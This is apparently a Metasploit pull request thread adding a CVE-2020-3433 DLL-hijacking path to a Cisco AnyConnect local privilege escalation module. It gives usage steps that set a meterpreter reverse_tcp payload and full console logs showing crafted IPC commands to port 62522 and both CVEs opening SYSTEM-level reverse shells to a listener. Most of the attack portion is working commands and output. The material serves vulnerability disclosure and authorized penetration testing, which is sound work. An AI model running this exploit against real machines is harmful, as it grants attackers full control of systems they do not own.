Added CVE-2020-3433 module

[goichot]

Hi,

This PR changes modules/exploit/windows/local/anyconnect_path_traversal_lpe module that exploits CVE-2020-3153 (msf module by @cdelafuente-r7) to add the possibility to exploit another local privilege escalation that I found in Cisco AnyConnect for Windows: CVE-2020-3433.

By default, this module will exploit CVE-2020-3433 (more versions vulnerable) but you can set an option to exploit CVE-2020-3153 (if vulnerable).

Cisco's advisory: link

My PoC and technical details for CVE-2020-3433 (+ CVE-2020-3434 & CVE-2020-3435) are on my GitHub: link (in particular, you can check the Details.md file).

Antoine

Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to a DLL hijacking and allows local attackers
to execute code on the affected machine with with system level privileges.

Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (vpndownloader), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since vpndownloader is also vulnerable to DLL
hijacking, a specially crafted DLL (dbghelp.dll) is created at the same
location vpndownloader will be copied to get code execution with system
privileges.

The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

Verification Steps

1. Start msfconsole
2. Get a session with non-administrative privileges
3. Do: use exploit/windows/local/anyconnect_lpe
4. Do: set SESSION <SESSION>
5. Do: set payload windows/meterpreter/reverse_tcp
6. Do: set LHOST <LHOST>
7. Do: set LPORT <LPORT>
8. Do: check
9. Do: run
10. You should get a new session as the SYSTEM user

Options

INSTALL_PATH

Set Cisco AnyConnect Secure Mobility Client installation path (where
vpndownloader.exeshould be found). It will be automatically detectedif not set.

CVE

Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.

ForceExploit

Set this to true to override the check result during exploitation.

[bwatters-r7]

To be clear, here is it working with both CVEs....

msf6 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3433
CVE => CVE-2020-3433
msf6 exploit(windows/local/anyconnect_lpe) > check

[-] Exploit failed: Msf::OptionValidateError The following options failed to validate: SESSION.
[-] Check failed: The state could not be determined.
msf6 exploit(windows/local/anyconnect_lpe) > set session 4
session => 4
msf6 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf6 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument not needed
[*] Creating directory C:\Users\msfuser\AppData\Local\Temp\JWZSH3
[*] Meterpreter Session
[*] C:\Users\msfuser\AppData\Local\Temp\JWZSH3 created
[*] Writing the payload to C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll
[*] IPC Command: "CAC-nc-install	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe	C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 280 bytes)
[*] Sending stage (175174 bytes) to 192.168.132.134
[*] Meterpreter session 5 opened (192.168.135.197:4444 -> 192.168.132.134:49684) at 2020-09-29 13:35:18 -0500
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\JWZSH3\dbghelp.dll
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\JWZSH3
[*] Shutdown the socket

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.132.134 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(windows/local/anyconnect_lpe) > set CVE CVE-2020-3153 
CVE => CVE-2020-3153
msf6 exploit(windows/local/anyconnect_lpe) > check

[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
msf6 exploit(windows/local/anyconnect_lpe) > run

[*] Started reverse TCP handler on 192.168.135.197:4444 
[*] Try to detect installation path...
[*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
[*] The target appears to be vulnerable. Cisco AnyConnect version 4.5.4029.0.0 < 4.8.02042 (CVE-2020-3153 & CVE-2020-3433).
[*] "-ipc" argument not needed
[*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
[*] IPC Command: "CAC-nc-install	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\pWul\pWul\pWul\pWul\../../../../vpndownloader.exe	-"
[*] Connecting to the AnyConnect agent on 127.0.0.1:62522
[*] Send the encoded IPC command (size = 259 bytes)
[*] Sending stage (175174 bytes) to 192.168.132.134
[*] Meterpreter session 6 opened (192.168.135.197:4444 -> 192.168.132.134:49687) at 2020-09-29 13:35:48 -0500
[+] Deleted C:\ProgramData\Cisco\dbghelp.dll
[+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
[*] Shutdown the socket

meterpreter > sysinfo
Computer        : DESKTOP-CL5L2IH
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[bwatters-r7]

Release Notes

Renamed the exploit/windows/local/anyconnect_path_traversal_lpe Cisco AnyConnect LPE module to exploits/windows/local/anyconnect_lpe and added the ability to exploit vulnerable targets via DLL hijacking (CVE-2020-3433).

[goichot]

Thanks @bwatters-r7!